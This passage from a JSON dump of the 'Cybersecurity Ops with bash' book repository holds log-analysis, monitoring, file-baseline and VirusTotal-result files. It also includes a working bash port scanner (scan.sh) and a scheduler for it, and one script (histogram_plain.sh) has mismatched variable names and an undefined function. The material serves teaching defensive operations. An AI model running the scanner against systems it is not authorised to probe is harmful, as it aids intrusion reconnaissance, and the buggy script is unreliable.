Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /request-quote.html HTTP/1.1\" 200 7326 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1\" 200 1385 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:46 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n"
  },
  {
    "path": "ch07/countem.awk",
    "content": "# Cybersecurity Ops with bash\n# countem.awk\n#\n# Description: \n# Count the number of instances of an item using awk\n#\n# Usage:\n# countem.awk < inputfile\n#\n\nawk '{ cnt[$1]++ }\nEND { for (id in cnt) {\n        printf \"%d %s\\n\", cnt[id], id\n      }\n    }'\n"
  },
  {
    "path": "ch07/countem.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# countem.sh\n#\n# Description: \n# Count the number of instances of an item using bash\n#\n# Usage:\n# countem.sh < inputfile\n#\n\ndeclare -A cnt        # assoc. array             # <1>\nwhile read id xtra                               # <2>\ndo\n    let cnt[$id]++                               # <3>\ndone\n# now display what we counted\n# for each key in the (key, value) assoc. array\nfor id in \"${!cnt[@]}\"                           # <4>\ndo    \n\tprintf '%s %d\\n'  \"$id\"  \"${cnt[$id]}\"       # <5>\ndone\n"
  },
  {
    "path": "ch07/histogram.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram.sh\n#\n# Description: \n# Generate a horizontal bar chart of specified data\n#\n# Usage: ./histogram.sh\n#   input format: label value\n#\n\nfunction pr_bar ()                            # <1>\n{\n    local -i i raw maxraw scaled              # <2>\n    raw=$1\n    maxraw=$2\n    ((scaled=(MAXBAR*raw)/maxraw))            # <3>\n    # min size guarantee\n    ((raw > 0 && scaled == 0)) && scaled=1\t\t\t\t# <4>\n\n    for((i=0; i<scaled; i++)) ; do printf '#' ; done\n    printf '\\n'\n    \n} # pr_bar\n\n#\n# \"main\"\n#\ndeclare -A RA\t\t\t\t\t\t# <5>\ndeclare -i MAXBAR max\nmax=0\nMAXBAR=50\t# how large the largest bar should be\n\nwhile read labl val\ndo\n    let RA[$labl]=$val\t\t\t\t\t# <6>\n    # keep the largest value; for scaling\n    (( val > max )) && max=$val\ndone\n\n# scale and print it\nfor labl in \"${!RA[@]}\"\t\t\t\t\t# <7>\ndo\n    printf '%-20.20s  ' \"$labl\"\n    pr_bar ${RA[$labl]} $max\t\t\t\t# <8>\ndone\n"
  },
  {
    "path": "ch07/histogram_plain.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram_plain.sh\n#\n# Description: \n# Generate a horizontal bar chart of specified data without\n# using associative arrays, good for older versions of bash\n#\n# Usage: ./histogram_plain.sh\n#   input format: label value\n#\n\ndeclare -a RA_key RA_val                                 # <1>\ndeclare -i max ndx\nmax=0\nmaxbar=50    # how large the largest bar should be\n\nndx=0\nwhile read labl val\ndo\n    RA_key[$ndx]=$labl                                   # <2>\n    RA_value[$ndx]=$val\n    # keep the largest value; for scaling\n    (( val > max )) && max=$val \n    let ndx++\ndone\n\n# scale and print it\nfor ((j=0; j<ndx; j++))                                  # <3>\ndo\n    printf \"%-20.20s  \" ${RA_key[$j]}\n    pr_bar ${RA_value[$j]} $max\ndone\n"
  },
  {
    "path": "ch07/pagereq.awk",
    "content": "# Cybersecurity Ops with bash\n# pagereq.awk\n#\n# Description: \n# Count the number of page requests for a given IP address using awk\n#\n# Usage:\n# pagereq <ip address> < inputfile\n#   <ip address> IP address to search for\n#\n\n# count the number of page requests from an address ($1)\nawk -v page=\"$1\" '{ if ($1==page) {cnt[$7]+=1 } }                # <1>\nEND { for (id in cnt) {                                          # <2>\n    printf \"%8d %s\\n\", cnt[id], id\n    }\n}'\n"
  },
  {
    "path": "ch07/pagereq.sh",
    "content": "# Cybersecurity Ops with bash\n# pagereq.sh\n#\n# Description: \n# Count the number of page requests for a given IP address using bash\n#\n# Usage:\n# pagereq <ip address> < inputfile\n#   <ip address> IP address to search for\n#\n\ndeclare -A cnt                                             # <1>\nwhile read addr d1 d2 datim gmtoff getr page therest\ndo\n    if [[ $1 == $addr ]] ; then let cnt[$page]+=1 ; fi\ndone\nfor id in ${!cnt[@]}                                       # <2>\ndo\n    printf \"%8d %s\\n\" ${cnt[$id]} $id\ndone\n"
  },
  {
    "path": "ch07/summer.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# summer.sh\n#\n# Description: \n# Sum the total of field 2 values for each unique field 1\n#\n# Usage: ./summer.sh\n#   input format: <name> <number>\n#\n\ndeclare -A cnt        # assoc. array\nwhile read id count\ndo\n  let cnt[$id]+=$count\ndone\nfor id in \"${!cnt[@]}\"\ndo\n    printf \"%-15s %8d\\n\"  \"${id}\"  \"${cnt[${id}]}\" #<1>\ndone\n"
  },
  {
    "path": "ch07/useragents.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# useragents.sh\n#\n# Description: \n# Read through a log looking for unknown user agents\n#\n# Usage: ./useragents.sh  <  <inputfile>\n#   <inputfile> Apache access log\n#\n\n\n# mismatch - search through the array of known names\n#  returns 1 (false) if it finds a match\n#  returns 0 (true) if there is no match\nfunction mismatch ()                                    # <1>\n{\n    local -i i                                          # <2>\n    for ((i=0; i<$KNSIZE; i++))\n    do\n        [[ \"$1\" =~ .*${KNOWN[$i]}.* ]] && return 1      # <3>\n    done\n    return 0\n}\n\n# read up the known ones\nreadarray -t KNOWN < \"useragents.txt\"                      # <4>\nKNSIZE=${#KNOWN[@]}                                     # <5>\n\n# preprocess logfile (stdin) to pick out ipaddr and user agent \nawk -F'\"' '{print $1, $6}' | \\\nwhile read ipaddr dash1 dash2 dtstamp delta useragent   # <6>\ndo\n    if mismatch \"$useragent\"\n    then\n        echo \"anomaly: $ipaddr $useragent\"\n    fi\ndone\n"
  },
  {
    "path": "ch07/useragents.txt",
    "content": "Firefox\nChrome\nSafari\nEdge\n"
  },
  {
    "path": "ch08/livebar.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# livebar.sh\n#\n# Description: \n# Creates a rolling horizontal bar chart of live data\n#\n# Usage:\n# <output from other script or program> | bash livebar.sh\n#\n\nfunction pr_bar ()\t\t\t\t\t# <1>\n{\n    local raw maxraw scaled\n    raw=$1\n    maxraw=$2\n    ((scaled=(maxbar*raw)/maxraw))\n    ((scaled == 0)) && scaled=1\t\t# min size guarantee\n    for((i=0; i<scaled; i++)) ; do printf '#' ; done\n    printf '\\n'\n    \n} # pr_bar\n\n\nmaxbar=60   # largest no. of chars in a bar\t\t# <2>\nMAX=60\nwhile read dayst timst qty\ndo\n    if (( qty > MAX ))\t\t\t\t\t# <3>\n    then\n\tlet MAX=$qty+$qty/4\t# allow some room\n\techo \"              **** rescaling: MAX=$MAX\"\n    fi\n    printf '%6.6s %6.6s %4d:' $dayst $timst $qty\t# <4>\n    pr_bar $qty $MAX\ndone\n"
  },
  {
    "path": "ch08/looper.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# looper.sh\n#\n# Description: \n# Count the lines in a file being tailed -f\n# Report the count interval on every SIGUSR1\n#\n# Usage: ./looper.sh [filename]\n#   filename of file to be tailed, default: log.file\n# \n\nfunction interval ()\t\t\t\t\t# <1>\n{\n    echo $(date '+%y%m%d %H%M%S') $cnt\t\t\t# <2>\n    cnt=0\n}\n\ndeclare -i cnt=0\ntrap interval SIGUSR1\t\t\t\t\t# <3>\n\nshopt -s lastpipe\t\t\t\t\t# <4>\n\ntail -f --pid=$$ ${1:-log.file} | while read aline\t# <5>\ndo\n    let cnt++\ndone\n"
  },
  {
    "path": "ch08/tailcount.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tailcount.sh\n#\n# Description: \n# Count lines every n seconds\n#\n# Usage: ./tailcount.sh [filename]\n#   filename: passed to looper.sh\n#\n\n# cleanup - the other processes on exit\nfunction cleanup ()\n{\n  [[ -n $LOPID ]] && kill $LOPID\t\t# <1>\n}\n\ntrap cleanup EXIT \t\t\t\t# <2>\n\nbash looper.sh $1 &\t\t\t\t# <3>\nLOPID=$!\t\t\t\t\t# <4>\n# give it a chance to start up\nsleep 3\n\nwhile true\ndo\n    kill -SIGUSR1 $LOPID\n    sleep 5\ndone >&2\t\t\t\t\t# <5>\n"
  },
  {
    "path": "ch08/wintail.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wintail.sh\n#\n# Description: \n# Perform a tail-like function on a Windows log\n#\n# Usage: ./wintail.sh \n#\n\nWINLOG=\"Application\"  #<1>\n\nLASTLOG=$(wevtutil qe \"$WINLOG\" //c:1 //rd:true //f:text)  #<2>\n\nwhile true\ndo\n\tCURRENTLOG=$(wevtutil qe \"$WINLOG\" //c:1 //rd:true //f:text)  #<3>\n\tif [[ \"$CURRENTLOG\" != \"$LASTLOG\" ]]\n\tthen\t\t\n\t\techo \"$CURRENTLOG\"\n\t\techo \"----------------------------------\"\n\t\tLASTLOG=\"$CURRENTLOG\"\n\tfi\ndone\n"
  },
  {
    "path": "ch09/autoscan.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# autoscan.sh\n#\n# Description: \n# Automatically performs a port scan (using scan.sh), \n# compares output to previous results, and emails user\n# Assumes that scan.sh is in the current directory.\n#\n# Usage: ./autoscan.sh\n#\n\n./scan.sh < hostlist                                      # <1>\n\nFILELIST=$(ls scan_* | tail -2)                           # <2>\nFILES=( $FILELIST )\n\nTMPFILE=$(tempfile)                                       # <3>\n\n./fd2.sh ${FILES[0]} ${FILES[1]}  > $TMPFILE\n\nif [[ -s $TMPFILE ]]   # non-empty                        # <4>\nthen\n    echo \"mailing today's port differences to $USER\"\n    mail -s \"today's port differences\" $USER < $TMPFILE   # <5>\nfi\n# clean up\nrm -f $TMPFILE                                            # <6>\n"
  },
  {
    "path": "ch09/fd2.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fd2.sh\n#\n# Description: \n# Compares two port scans to find changes\n# MAJOR ASSUMPTION: both files have the same # of lines,\n# each line with the same host address\n# though with possibly different listed ports\n#\n# Usage: ./fd2.sh <file1> <file2>\n#\n\n# look for \"$LOOKFOR\" in the list of args to this function\n# returns true (0) if it is not in the list\nfunction NotInList ()                                            # <1>\n{\n    for port in \"$@\"\n    do\n        if [[ $port == $LOOKFOR ]]\n        then\n            return 1\n        fi\n    done\n    return 0\n}\n\nwhile true\ndo\n    read aline <&4 || break         # at EOF                  # <2>\n    read bline <&5 || break         # at EOF, for symmetry    # <3>\n\n    # if [[ $aline == $bline ]] ; then continue; fi\n    [[ $aline == $bline ]] && continue;                       # <4>\n\n    # there's a difference, so we\n    # subdivide into host and ports\n    HOSTA=${aline%% *}                                        # <5>\n    PORTSA=( ${aline#* } )                                    # <6>\n\n    HOSTB=${bline%% *}\n    PORTSB=( ${bline#* } )\n\n    echo $HOSTA                 # identify the host which changed\n\n    for porta in ${PORTSA[@]}\n    do         # <7>\n          LOOKFOR=$porta NotInList ${PORTSB[@]} && echo \"  closed: $porta\"\n    done\n\n    for portb in ${PORTSB[@]}\n    do\n          LOOKFOR=$portb NotInList ${PORTSA[@]} && echo \"     new: $portb\"\n    done\n\ndone 4< ${1:-day1.data} 5< ${2:-day2.data}                   # <8>\n# day1.data and day2.data are default names to make it easier to test\n"
  },
  {
    "path": "ch09/scan.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# scan.sh\n#\n# Description: \n# Perform a port scan of a specified host\n#\n# Usage: ./scan.sh <output file>\n#   <output file> File to save results in\n#\n\nfunction scan ()\n{\n  host=$1\n  printf '%s' \"$host\"                                       # <1>\n  for ((port=1;port<1024;port++))\n  do\n    # order of redirects is important for 2 reasons\n    echo >/dev/null 2>&1  < /dev/tcp/${host}/${port}        # <2>\n    if (($? == 0)) ; then printf ' %d' \"${port}\" ; fi       # <3>\n  done\n  echo # or printf '\\n'\n}\n\n#\n# main loop\n#    read in each host name (from stdin)\n#     and scan for open ports\n#    save the results in a file\n#    whose name is supplied as an argument\n#     or default to one based on today's date\n#\n\nprintf -v TODAY 'scan_%(%F)T' -1   # e.g., scan_2017-11-27  # <4>\nOUTFILE=${1:-$TODAY}                                        # <5>\n\nwhile read HOSTNAME\ndo\n    scan $HOSTNAME\ndone > $OUTFILE                                             # <6>\n"
  },
  {
    "path": "ch10/baseline.sh",
    "content": "#!/bin/bash\n\n# baseline.sh - compare baselines\n#              and report on differences\n#\n\nfunction usageErr ()\n{\n    echo 'usage: baseline.sh [-d path] file1 [file2]'\n    echo 'creates or compares a baseline from path'\n    echo 'default for path is /'\n    exit 2\n} >&2                                                          # <1>\n\nfunction dosumming ()\n{\n    find \"${DIR[@]}\" -type f | xargs -d '\\n' sha1sum           # <2>\n}\n\n# ===============================\n# MAIN\n# ===============================\n\ndeclare -a DIR\n\n# ---------- parse the arguments \n\nwhile getopts \"d:\" MYOPT                                   # <3>\ndo\n    # no check for MYOPT since there is only one choice\n    DIR+=( \"$OPTARG\" )                                     # <4>\ndone\nshift $((OPTIND-1))                                        # <5>\n\n# no arguments? too many?\n(( $# == 0 || $# > 2 )) &&  usageErr \n\n(( ${#DIR[*]} == 0 )) && DIR=( \"/\" )                       # <6>\n\n\n# create either a baseline (only 1 filename provided)\n# or a secondary summary (when two filenames are provided)\n\nBASE=\"$1\"\nB2ND=\"$2\"\n\nif (( $# == 1 ))    # only 1 arg.\nthen\n    # creating \"$BASE\"\n    dosumming > \"$BASE\" \n    # all done for baseline\n    exit\nfi\n\nif [[ ! -r \"$BASE\" ]]\nthen\n    usageErr\nfi\n\n# --------- on to the actual work:\n\n# if 2nd file exists just compare the two\n# else create/fill it\nif [[ ! -e \"$B2ND\" ]]\nthen\n    echo creating \"$B2ND\"\n    dosumming > \"$B2ND\"\nfi\n\n# now we have: 2 files created by sha1sum\ndeclare -A BYPATH BYHASH INUSE \t# assoc. arrays\n\n# load up the first file as the baseline\nwhile read HNUM FN\ndo\n    BYPATH[\"$FN\"]=$HNUM\n    BYHASH[$HNUM]=\"$FN\"\n    INUSE[\"$FN\"]=\"X\"\ndone < \"$BASE\"\n\n# ------ now begin the output\n# see if each filename listed in the 2nd file is in\n# the same place (path) as in the 1st (the baseline)\n\nprintf '<filesystem host=\"%s\" dir=\"%s\">\\n' \"$HOSTNAME\"  \"${DIR[*]}\"\n\nwhile read HNUM FN\t\t\t\t\t# <7>\ndo\n    WASHASH=\"${BYPATH[${FN}]}\"\n    # did it find one? if not, it will be null\n    if [[ -z $WASHASH ]]\n    then\n\tALTFN=\"${BYHASH[$HNUM]}\"\n\tif [[ -z $ALTFN ]]\n\tthen\n\t    printf '  <new>%s</new>\\n' \"$FN\"\n\telse\n\t    printf '  <relocated orig=\"%s\">%s</relocated>\\n' \"$ALTFN\" \"$FN\"\n\t    INUSE[\"$ALTFN\"]='_'\t# mark this as seen\n\tfi\n    else\n\tINUSE[\"$FN\"]='_'\t# mark this as seen\n\tif [[ $HNUM == $WASHASH ]]\n\tthen\n\t    continue;\t\t# nothing changed;\n\telse\n\t    printf '  <changed>%s</changed>\\n' \"$FN\"\n\tfi\n    fi\ndone < \"$B2ND\"                                          # <8>\n\nfor FN in \"${!INUSE[@]}\"\ndo\n    if [[ \"${INUSE[$FN]}\" == 'X' ]]\n    then\n        printf '  <removed>%s</removed>\\n' \"$FN\"\n    fi\ndone\n\nprintf '</filesystem>\\n'\n\n"
  },
  {
    "path": "ch11/Calc_VT.txt",
    "content": "{\"scans\": {\"Bkav\": {\"detected\": false, \"version\": \"1.3.0.9466\", \"result\": null, \"update\": \"20180712\"}, \"MicroWorld-eScan\": {\"detected\": false, \"version\": \"14.0.297.0\", \"result\": null, \"update\": \"20180712\"}, \"VBA32\": {\"detected\": false, \"version\": \"3.12.32.0\", \"result\": null, \"update\": \"20180712\"}, \"CMC\": {\"detected\": false, \"version\": \"1.1.0.977\", \"result\": null, \"update\": \"20180712\"}, \"CAT-QuickHeal\": {\"detected\": false, \"version\": \"14.00\", \"result\": null, \"update\": \"20180712\"}, \"McAfee\": {\"detected\": false, \"version\": \"6.0.6.653\", \"result\": null, \"update\": \"20180712\"}, \"Cylance\": {\"detected\": true, \"version\": \"2.3.1.101\", \"result\": \"Unsafe\", \"update\": \"20180712\"}, \"AegisLab\": {\"detected\": false, \"version\": \"4.2\", \"result\": null, \"update\": \"20180712\"}, \"CrowdStrike\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180530\"}, \"K7GW\": {\"detected\": false, \"version\": \"10.53.27735\", \"result\": null, \"update\": \"20180712\"}, \"K7AntiVirus\": {\"detected\": false, \"version\": \"10.53.27740\", \"result\": null, \"update\": \"20180712\"}, \"TheHacker\": {\"detected\": false, \"version\": \"6.8.0.5.3314\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro\": {\"detected\": false, \"version\": \"10.0.0.1040\", \"result\": null, \"update\": \"20180712\"}, \"Baidu\": {\"detected\": false, \"version\": \"1.0.0.2\", \"result\": null, \"update\": \"20180712\"}, \"NANO-Antivirus\": {\"detected\": false, \"version\": \"1.0.116.23366\", \"result\": null, \"update\": \"20180712\"}, \"F-Prot\": {\"detected\": false, \"version\": \"4.7.1.166\", \"result\": null, \"update\": \"20180712\"}, \"Symantec\": {\"detected\": false, \"version\": \"1.6.0.0\", \"result\": null, \"update\": \"20180712\"}, \"ESET-NOD32\": {\"detected\": false, \"version\": \"17703\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro-HouseCall\": {\"detected\": false, \"version\": \"9.950.0.1006\", \"result\": null, \"update\": \"20180712\"}, \"Paloalto\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180712\"}, \"ClamAV\": {\"detected\": false, \"version\": \"0.100.1.0\", \"result\": null, \"update\": \"20180712\"}, \"Kaspersky\": {\"detected\": false, \"version\": \"15.0.1.13\", \"result\": null, \"update\": \"20180712\"}, \"BitDefender\": {\"detected\": false, \"version\": \"7.2\", \"result\": null, \"update\": \"20180712\"}, \"Babable\": {\"detected\": false, \"version\": \"9107201\", \"result\": null, \"update\": \"20180406\"}, \"ViRobot\": {\"detected\": false, \"version\": \"2014.3.20.0\", \"result\": null, \"update\": \"20180712\"}, \"Avast\": {\"detected\": false, \"version\": \"18.4.3895.0\", \"result\": null, \"update\": \"20180712\"}, \"Tencent\": {\"detected\": false, \"version\": \"1.0.0.1\", \"result\": null, \"update\": \"20180712\"}, \"Endgame\": {\"detected\": false, \"version\": \"3.0.0\", \"result\": null, \"update\": \"20180711\"}, \"Sophos\": {\"detected\": false, \"version\": \"4.98.0\", \"result\": null, \"update\": \"20180712\"}, \"Comodo\": {\"detected\": false, \"version\": \"29334\", \"result\": null, \"update\": \"20180712\"}, \"F-Secure\": {\"detected\": false, \"version\": \"11.0.19100.45\", \"result\": null, \"update\": \"20180712\"}, \"DrWeb\": {\"detected\": false, \"version\": \"7.0.33.6080\", \"result\": null, \"update\": \"20180712\"}, \"VIPRE\": {\"detected\": false, \"version\": \"68060\", \"result\": null, \"update\": \"20180712\"}, \"Invincea\": {\"detected\": false, \"version\": \"6.3.5.26121\", \"result\": null, \"update\": \"20180601\"}, \"McAfee-GW-Edition\": {\"detected\": false, \"version\": \"v2017.3010\", \"result\": null, \"update\": \"20180712\"}, \"Emsisoft\": {\"detected\": false, \"version\": \"2018.4.0.1029\", \"result\": null, \"update\": \"20180712\"}, \"SentinelOne\": {\"detected\": false, \"version\": \"1.0.17.227\", \"result\": null, \"update\": \"20180701\"}, \"Cyren\": {\"detected\": false, \"version\": \"6.0.0.4\", \"result\": null, \"update\": \"20180712\"}, \"Jiangmin\": {\"detected\": false, \"version\": \"16.0.100\", \"result\": null, \"update\": \"20180712\"}, \"Webroot\": {\"detected\": false, \"version\": \"1.0.0.403\", \"result\": null, \"update\": \"20180712\"}, \"Avira\": {\"detected\": false, \"version\": \"8.3.3.6\", \"result\": null, \"update\": \"20180710\"}, \"MAX\": {\"detected\": false, \"version\": \"2017.11.15.1\", \"result\": null, \"update\": \"20180712\"}, \"Antiy-AVL\": {\"detected\": false, \"version\": \"3.0.0.1\", \"result\": null, \"update\": \"20180712\"}, \"Kingsoft\": {\"detected\": false, \"version\": \"2013.8.14.323\", \"result\": null, \"update\": \"20180712\"}, \"Microsoft\": {\"detected\": false, \"version\": \"1.1.15000.2\", \"result\": null, \"update\": \"20180712\"}, \"Arcabit\": {\"detected\": false, \"version\": \"1.0.0.831\", \"result\": null, \"update\": \"20180712\"}, \"SUPERAntiSpyware\": {\"detected\": false, \"version\": \"5.6.0.1032\", \"result\": null, \"update\": \"20180712\"}, \"ZoneAlarm\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180712\"}, \"Avast-Mobile\": {\"detected\": false, \"version\": \"180711-22\", \"result\": null, \"update\": \"20180712\"}, \"GData\": {\"detected\": false, \"version\": \"A:25.17758B:25.12706\", \"result\": null, \"update\": \"20180712\"}, \"AhnLab-V3\": {\"detected\": false, \"version\": \"3.13.1.21452\", \"result\": null, \"update\": \"20180712\"}, \"ALYac\": {\"detected\": false, \"version\": \"1.1.1.5\", \"result\": null, \"update\": \"20180712\"}, \"AVware\": {\"detected\": false, \"version\": \"1.6.0.52\", \"result\": null, \"update\": \"20180712\"}, \"TACHYON\": {\"detected\": false, \"version\": \"2018-07-12.02\", \"result\": null, \"update\": \"20180712\"}, \"Ad-Aware\": {\"detected\": false, \"version\": \"3.0.5.370\", \"result\": null, \"update\": \"20180712\"}, \"Malwarebytes\": {\"detected\": false, \"version\": \"2.1.1.1115\", \"result\": null, \"update\": \"20180712\"}, \"Zoner\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180711\"}, \"Rising\": {\"detected\": false, \"version\": \"25.0.0.20\", \"result\": null, \"update\": \"20180712\"}, \"Yandex\": {\"detected\": false, \"version\": \"5.5.1.3\", \"result\": null, \"update\": \"20180712\"}, \"Ikarus\": {\"detected\": false, \"version\": \"0.1.5.2\", \"result\": null, \"update\": \"20180712\"}, \"eGambit\": {\"detected\": false, \"version\": null, \"result\": null, \"update\": \"20180712\"}, \"Fortinet\": {\"detected\": false, \"version\": \"5.4.247.0\", \"result\": null, \"update\": \"20180712\"}, \"AVG\": {\"detected\": false, \"version\": \"18.4.3895.0\", \"result\": null, \"update\": \"20180712\"}, \"Cybereason\": {\"detected\": false, \"version\": \"1.2.27\", \"result\": null, \"update\": \"20180225\"}, \"Panda\": {\"detected\": false, \"version\": \"4.6.4.2\", \"result\": null, \"update\": \"20180712\"}, \"Qihoo-360\": {\"detected\": false, \"version\": \"1.0.0.1120\", \"result\": null, \"update\": \"20180712\"}}, \"scan_id\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370\", \"sha1\": \"1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480\", \"resource\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd\", \"response_code\": 1, \"scan_date\": \"2018-07-12 16:02:50\", \"permalink\": \"https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/\", \"verbose_msg\": \"Scan finished, information embedded\", \"total\": 66, \"positives\": 1, \"sha256\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd\", \"md5\": \"afaf2cdf9981342c494b28630608f74a\"}"
  },
  {
    "path": "ch11/WannaCry_VT.txt",
